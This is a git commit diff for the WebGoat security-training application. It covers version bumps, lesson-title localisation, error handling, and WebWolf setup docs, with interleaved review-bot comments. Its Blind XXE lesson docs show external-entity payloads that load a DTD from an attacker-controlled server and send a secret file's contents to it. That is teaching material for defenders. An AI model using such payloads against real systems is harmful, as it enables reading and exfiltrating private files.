merging from release branch ... PR's and Nanne's recent work

This commit is contained in:
Jason
2018-05-02 14:27:44 -06:00
87 changed files with 542 additions and 174 deletions


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>


@ -46,7 +46,6 @@ public class Flag extends Endpoint {
@PostConstruct
public void initFlags() {
IntStream.range(1, 10).forEach(i -> FLAGS.put(i, UUID.randomUUID().toString()));
FLAGS.entrySet().stream().forEach(e -> log.debug("Flag {} {}", e.getKey(), e.getValue()));
}
@Override


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -56,7 +56,7 @@ public class ClientSideFiltering extends NewLesson {
@Override
public String getTitle() {
return "Client side filtering";
return "client.side.filtering.title";
}
@Override


@ -1,3 +1,4 @@
client.side.filtering.title=Client side filtering
ClientSideFilteringSelectUser=Select user:
ClientSideFilteringUserID=User ID
ClientSideFilteringFirstName=First Name


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<build>
<plugins>


@ -60,7 +60,7 @@ public class CrossSiteScripting extends NewLesson {
@Override
public String getTitle() {
return "Cross Site Scripting";
return "xss.title";
}
@Override


@ -1,4 +1,5 @@
# XSS success, failure messages and hints
xss.title=Cross Site Scripting
xss-reflected-5a-success=well done, but alerts aren't very impressive are they? Please continue.
xss-reflected-5a-failure=Try again. We do want to see this specific javascript (in case you are trying to do something more fancy)
xss-reflected-5b-success=Correct ... because <ul><li>The script was not triggered by the URL/QueryString</li><li>Even if you use the attack URL in a new tab, it won't execute (becuase of response type). Try it if you like.</li></ul>


@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -33,7 +33,7 @@ public class CSRFLogin extends AssignmentEndpoint {
}
private void markAssignmentSolvedWithRealUser(String username) {
UserTracker userTracker = userTrackerRepository.findOne(username);
UserTracker userTracker = userTrackerRepository.findByUser(username);
userTracker.assignmentSolved(getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
userTrackerRepository.save(userTracker);
}
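Review bot: `userTrackerRepository.findByUser(username)` on the new line can return null when no tracker exists for the given username (presumably a Spring Data derived query; the replaced `findOne` had the same gap), and the following line dereferences the result unconditionally, so an unknown name ends in a NullPointerException instead of a clear failure. Guard it before use, e.g. `if (userTracker == null) { throw new IllegalStateException("No UserTracker for user " + username); }`, or use `orElseThrow` if the repository can return an `Optional`. Because this method marks an assignment solved for whichever username it is handed, the caller should ensure that name is the session's own user; that check is outside this hunk. markAssignmentSolvedWithRealUser is complete within the hunk, but the class continues outside it.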


@ -8,11 +8,11 @@ In this assignment you need to achieve to POST the following JSON message to our
[source]
----
POST /csrf/feedback HTTP/1.1
POST /csrf/feedback/message HTTP/1.1
{
"name" : "WebGoat",
"email" : "webgoat@webgoat.org"
"email" : "webgoat@webgoat.org",
"content" : "WebGoat is the best!!"
}
----


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -8,6 +8,7 @@ http-basics.hints.http_basic_quiz.1=Turn on Show Parameters or other features
http-basics.hints.http_basic_quiz.2=Try to intercept the request with <a href='https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project' title='Link to ZAP'>OWASP ZAP</a>
http-basics.empty=Try again, name cannot be empty.
http-basics.reversed=The server has reversed your name: {0}
http-basics.close=Try again: but this time enter a value before hitting go.


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -5,12 +5,12 @@
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<packaging>pom</packaging>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
<parent>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<modules>


@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -53,7 +53,7 @@ public class SqlInjectionAdvanced extends NewLesson {
@Override
public String getTitle() {
return "SQL Injection (advanced)";
return "sql.advanced.title";
}
@Override


@ -60,7 +60,7 @@ public class SqlInjection extends NewLesson {
@Override
public String getTitle() {
return "SQL Injection";
return "sql.injection.title";
}
@Override


@ -53,7 +53,7 @@ public class SqlInjectionMitigations extends NewLesson {
@Override
public String getTitle() {
return "SQL Injection (mitigations)";
return "sql.mitigation.title";
}
@Override
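Review bot: The new key `sql.mitigation.title` resolves to `SQL Injection (mitigation)` in the properties added in this same commit, whereas the literal being replaced read `SQL Injection (mitigations)`, so the displayed lesson title silently changes as part of an i18n refactor. If the plural was intended, change the properties value to `sql.mitigation.title=SQL Injection (mitigations)`; otherwise the rename is worth a mention in the commit message. The other two SQL lessons keep their titles byte-for-byte, which suggests this difference is accidental. getTitle is complete within the hunk; the class continues outside it.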


@ -1,6 +1,12 @@
#StringSqlInjection.java
StringSqlInjectionSecondStage=Now that you have successfully performed an SQL injection, try the same type of attack on a parameterized query. Restart the lesson if you wish to return to the injectable query.
EnterLastName=Enter your last name:
sql.injection.title=SQL Injection
sql.mitigation.title=SQL Injection (mitigation)
sql.advanced.title=SQL Injection (advanced)
NoResultsMatched=No results matched. Try Again.
SqlStringInjectionHint1=The application is taking your input and inserting it at the end of a pre-formed SQL command.
SqlStringInjectionHint2=This is the code for the query being built and issued by WebGoat:<br><br> "SELECT * FROM user_data WHERE last_name = "accountName"


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>
<dependency>


@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>


@ -8,6 +8,7 @@ import org.springframework.beans.factory.annotation.Value;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.client.RestClientException;
import org.springframework.web.client.RestTemplate;
import java.time.LocalDateTime;
@ -39,7 +40,11 @@ public class MailAssignment extends AssignmentEndpoint {
.contents("This is a test message from WebWolf, your unique code is: " + StringUtils.reverse(username))
.sender("webgoat@owasp.org")
.build();
restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
try {
restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
} catch (RestClientException e ) {
return informationMessage().feedback("webwolf.email_failed").output(e.getMessage()).build();
}
return informationMessage().feedback("webwolf.email_send").feedbackArgs(email).build();
} else {
return informationMessage().feedback("webwolf.email_mismatch").feedbackArgs(username).build();
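Review bot: The new catch block passes `e.getMessage()` straight into `.output(...)`, so whatever the `RestClientException` carries — typically the configured WebWolf URL plus the underlying transport error — is rendered to the user, while the exception itself is dropped without being logged server-side. Keep the user-facing text to the `webwolf.email_failed` message and record the cause in the log instead: `} catch (RestClientException e) {` / `log.warn("Could not deliver mail event to WebWolf at {}", webWolfURL, e);` / `return informationMessage().feedback("webwolf.email_failed").build();` (assuming the class has an SLF4J `log` field; its declarations are not visible here). Catching `RestClientException` rather than a blanket `Exception` is the right width for this call. The enclosing handler method starts and ends outside the hunk.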


@ -12,6 +12,7 @@
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:Receiving_mail.adoc"></div>
<div class="attack-container">
<img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<form class="attack-form" accept-charset="UNKNOWN"
method="POST" name="form"
@ -66,6 +67,7 @@
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:Landing_page.adoc"></div>
<div class="attack-container">
<img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<a href="/WebGoat/WebWolf/landing/password-reset" target="_blank">Click here to reset your password</a>


@ -2,7 +2,7 @@ webwolf.title=WebWolf
webwolf.email_send=An email has been send to {0} please check your inbox.
webwolf.code_incorrect=That is not the correct code: {0}, please try again.
webwolf.email_failed=There was an error while sending the e-mail. Is WebWolf running?
webwolf.email_mismatch=Of course you can send mail to user {0} however you will not be able to read this e-mail in WebWolf, please use your own username.





@ -1,7 +1,17 @@
== Introducing WebWolf
NOTE: You only need WebWolf if you a lesson specifies you can use it. For a lot of lessons you use WebGoat without
starting WebWolf.
You only need WebWolf if you a lesson specifies you can use it. For a lot of lessons you use WebGoat without
starting WebWolf. If you need to do an exercise with WebWolf make sure it is running along side with WebGoat. Lessons
where you can use WebWolf are marked with the following icon (top right in assignment):
{nbsp}
image::images/wolf-enabled.png[width=115,height=128]
{nbsp}
Even if the icon the present your are not obliged to use WebWolf, you can also use any intercepting tool you like, like
`netcat` etc.
WebWolf is a separate web application which simulates an attackers machine. It makes it possible for us to
make a clear distinction between what takes place on the attacked website and the actions you need to do as
@ -20,12 +30,18 @@ are not using the Docker image you will need to download the jar file and start
java -jar webwolf-<<version>>.jar
```
WebWolf is also available as a Docker container:
WebWolf is also available as a Docker container, because it shares the database with WebGoat we first need
to find out the ip address of the Docker container.
```
docker pull webwolf/webwolf-8.0
docker run -it 8081:8081 /home/webwolf/run.sh
WEBGOAT_SERVER_ADDRESS=$(docker inspect -f "{{ .NetworkSettings.IPAddress }}" `docker ps | grep webgoat | awk '{print $1}'`)
docker pull webgoat/webwolf
docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 8081:8081 webgoat/webwolf /home/webwolf/run.sh
```
Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. If
you start WebGoat as Docker container you need to start WebWolf as Docker container as well.
This will start the application on port 8081, click webWolfLink:here[] to open WebWolf.
First thing you need to do is register a new user within WebWolf.


@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>


@ -58,7 +58,7 @@ public class XXE extends NewLesson {
@Override
public String getTitle() {
return "XXE";
return "xxe.title";
}
@Override


@ -144,6 +144,7 @@
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:XXE_blind_assignment.adoc"></div>
<div class="attack-container">
<img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<form class="attack-form" accept-charset="UNKNOWN"
method="POST" name="form"


@ -22,6 +22,7 @@
# projects.
# <p>
#
xxe.title=XXE
xxe.simple.output=Welcome {0} you can now login to our website
xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE
xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed





@ -1,4 +1,3 @@
== Blind XXE
In some cases you will see no output because although your attack might have worked the field is not reflected in the output of page.
@ -6,25 +5,25 @@ Or the resource you are trying to read contains illegal XML character which caus
Let's start with an example, in this case we reference an external DTD which we control on our own server.
As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example
use this server to ping it using `http://localhost:8081/ping?text=HelloWorld
use this server to ping it using `webWolfLink:landing[noLink]`
How do we use this endpoint to verify whether we can perform XXE?
We can again use WebWolf to host a file called `attack.dtd`, create this file with the following contents:
[source]
[source, subs="macros, specialcharacters"]
----
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM 'http://localhost:8081/ping?text=HelloWorld'>
<!ENTITY ping SYSTEM 'webWolfLink:landing[noLink]'>
----
Now submit the form change the xml using to:
[source]
[source, subs="macros, specialcharacters"]
----
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://localhost:8081/WebWolf/files/attack.dtd">
<!ENTITY % remote SYSTEM "webWolfLink:files/attack.dtd[noLink]">
%remote;
]>
<comment>


@ -9,15 +9,15 @@ DTD.
|OS |Location
|Linux
|`/home/USER/.webgoat/XXE/secret.txt`
|`/home/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|Windows
|`c:/Users/USER/.webgoat/XXE/secret.txt`
|`c:/Users/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|Docker
|`/home/webgoat/.webgoat/XXE/secret.txt`
|`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|===
Try to upload this file using WebWolf landing page for example: `http://localhost:8081/WebWolf/landing?text=[contents_file]`
Try to upload this file using WebWolf landing page for example: `webWolfLink:landing?text=contents_file[noLink]`
(NOTE: this endpoint is under your full control)
Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.